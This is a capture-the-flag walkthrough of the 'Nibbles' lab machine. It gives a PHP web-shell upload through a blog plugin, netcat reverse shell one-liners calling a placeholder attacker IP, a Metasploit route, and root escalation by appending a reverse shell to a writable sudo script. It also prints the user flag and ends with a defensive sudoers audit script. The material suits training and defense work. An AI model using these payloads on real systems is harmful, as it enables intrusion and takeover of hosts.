Nibbles

Overview

Remember that enumeration is an iterative process. After performing our Nmap port scans, make sure to perform detailed enumeration against all open ports based on what is running on the discovered ports. Follow the same process as we did with Nibbles:

  • Enumeration/Scanning with Nmap - perform a quick scan for open ports followed by a full port scan

  • Web Footprinting - check any identified web ports for running web applications, and any hidden files/directories. Some useful tools for this phase include whatweb and Gobuster

  • If you identify the website URL, you can add it to your '/etc/hosts' file with the IP you get in the question below to load it normally, though this is unnecessary.

  • After identifying the technologies in use, use a tool such as Searchsploit to find public exploits or search on Google for manual exploitation techniques

  • After gaining an initial foothold, use the Python3 pty trick to upgrade to a pseudo TTY

  • Perform manual and automated enumeration of the file system, looking for misconfigurations, services with known vulnerabilities, and sensitive data in cleartext such as credentials

  • Organize this data offline to determine the various ways to escalate privileges to root on this target

There are two ways to gain a foothold: one using Metasploit and one via a manual process. Challenge yourself to work through and gain an understanding of both methods.

There are two ways to escalate privileges to root on the target after obtaining a foothold. Make use of helper scripts such as LinEnum and LinPEAS to assist you. Filter through the information searching for two well-known privilege escalation techniques.

Hacking the Box

Check the website first in Firefox.

Check the source code: a comment references a directory named /nibbleblog/.

Scan the target with Nmap.

Use Gobuster to see what other directories and file extensions exist.

Work through the different directories

The /admin.php is a login page. The source code doesn't reveal anything.

Check the /content directory; /content/private/users.xml reveals that one of the users is admin.

Checking /content/private/config.xml, the word nibbles appears repeatedly, and it happens to be the password for the admin account.

Signing into the /admin.php with the credentials above gives a bit more access.

Under the Plugins tab, go to the My Image plugin to upload a .php file.

<?php system('id'); ?>

Create a new .php file with the code above. This code tests for code execution.

Upload the file and save changes. You'll get a bunch of errors but it looks like the code successfully uploaded.

We need to figure out where the file got uploaded.

In the /content directory there is a plugins directory and another sub-directory for my_image.

http://<host>/nibbleblog/content/private/plugins/my_image/

Attempt to gain command execution on the server by requesting image.php with curl:

curl http://10.129.42.190/nibbleblog/content/private/plugins/my_image/image.php

If you get the following back, then you have gained remote code execution:

uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)

Next, modify the PHP file to obtain a reverse shell. Use the following Bash reverse shell one-liner and add it to the PHP script:

<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [ATTACKING_IP] [LISTENING_PORT] >/tmp/f"); ?>

Upload the file again to the website as above, then start a netcat listener:

nc -lvnp 9443

cURL the image page again (as above) or browse to it in Firefox at http://<host>/nibbleblog/content/private/plugins/my_image/image.php to execute the reverse shell.

It worked better when I used cURL. This should give you reverse access.

Before we move forward with additional enumeration, let us upgrade our shell to a "nicer" shell, since the shell we caught is not a fully interactive TTY: commands such as su will not work, we cannot use text editors, tab completion does not work, etc. Use the link below to learn how to fully upgrade your reverse shell to a fully interactive TTY.

We will use a Python one-liner to spawn a pseudo-terminal so commands such as su and sudo will work.

python3 -c 'import pty; pty.spawn("/bin/bash")'

This will give you a more interactive terminal access.

Change to the following directory to read the user.txt flag:

/home/nibbler

79c03865431abf47b90ef24b9695e148

METASPLOIT ALTERNATIVE to gaining access

Start msfconsole on your host machine.

Search for an exploit for nibbleblog

search nibbleblog

Type the following to load the exploit:

use 0

Check the options and set the RHOST to the TARGET_IP and LHOST to HOST_IP (tun0 address).

Set the USERNAME and PASSWORD options as admin:nibbles

Set the TARGETURI to nibbleblog

Next, change the payload type. We will use a generic reverse TCP payload:

generic/shell_reverse_tcp

Once the exploit completes, you will have terminal access as the nibbler account.

Next is to escalate privileges.

Start by unzipping the personal.zip file in /home/nibbler; inside is a file called monitor.sh.

unzip personal.zip

The shell script monitor.sh is a monitoring script, and it is owned by our nibbler user and writable. cat the file to preview it:

cat monitor.sh

Let us put this aside for now and pull in LinEnum.sh to perform some automated privilege escalation checks. First, download the script to your local attack VM or the Pwnbox.

Start by making a directory called linenum in your working directory and cd into it. Run this command from there to download the script:

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

Then, on your host machine in the directory containing LinEnum.sh, start a Python HTTP server:

sudo python3 -m http.server 8080

On target machine:

wget http://[HOST_IP]:8080/LinEnum.sh

On the target machine, make the file executable:

chmod +x LinEnum.sh

Run the script on the target machine and wait for it to finish; this will take a while:

./LinEnum.sh

The nibbler user can run the file /home/nibbler/personal/stuff/monitor.sh with root privileges. Since we have full control over that file, if we append a reverse shell one-liner to the end of it and execute it with sudo, we should get a reverse shell back as the root user. Let us edit monitor.sh to append a reverse shell one-liner:

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [HOST_IP] 8443 >/tmp/f' | tee -a monitor.sh

If we cat the monitor.sh file, we will see the contents appended to the end. This is crucial whenever we leverage a writable file for privilege escalation: only append to the end of the file (after making a backup copy of it) to avoid overwriting it and causing a disruption.

Start a new netcat listener on another terminal:

nc -lvnp 8443

Execute the script with sudo:

sudo /home/nibbler/personal/stuff/monitor.sh

You should now have root privileges on your listening terminal. Read /root/root.txt for the final flag.
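The root cause of this escalation is a sudo rule whose target is a script the low-privileged user owns and can edit, which is the kind of misconfiguration an administrator should audit for. The following check is an added example and not part of the original walkthrough: it parses a sudoers fragment and flags rules whose command is not root-owned or is group/world writable. The sudoers text is constructed (only the monitor.sh path comes from the page; the rule syntax around it is an assumption), and demo() stands in a world-writable temp file for monitor.sh.

```python
import os
import re
import stat
import tempfile

# Constructed sudoers fragment modelled on the rule this box relies on; only the
# path is from the page, the surrounding syntax is an assumption.
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
nibbler ALL=(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
"""

# user host=(runas) [TAG:]... command[, command...]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+\S+\s*=\s*(?:\([^)]*\)\s*)?(?:[A-Z]+:\s*)*(?P<cmds>.+)$")

def parse_sudo_rules(text):
    """Return (user, absolute command path) pairs from a sudoers fragment."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        for cmd in m.group("cmds").split(","):
            path = cmd.strip().split()[0]
            if path.startswith("/"):  # skip ALL and Cmnd aliases
                rules.append((m.group("user"), path))
    return rules

def weakly_owned(path):
    """Not root-owned, or group/world writable: whoever can edit it runs as root."""
    st = os.stat(path)
    return st.st_uid != 0 or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def find_risky_rules(text, check=weakly_owned):
    """Rules whose command exists on disk and fails the ownership check."""
    return [(u, p) for u, p in parse_sudo_rules(text) if os.path.isfile(p) and check(p)]

def demo():
    """Self-contained run: a world-writable temp script stands in for monitor.sh."""
    with tempfile.TemporaryDirectory() as d:
        script = os.path.join(d, "monitor.sh")
        with open(script, "w") as f:
            f.write("#!/bin/bash\necho monitoring\n")
        os.chmod(script, 0o666)
        return find_risky_rules(SAMPLE_SUDOERS + "nibbler ALL=(root) NOPASSWD: " + script + "\n")
```

The fix on a real host is to point the rule at a root-owned script in a root-owned directory (or drop the rule), so the file and its parent cannot be modified by the user the rule grants.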
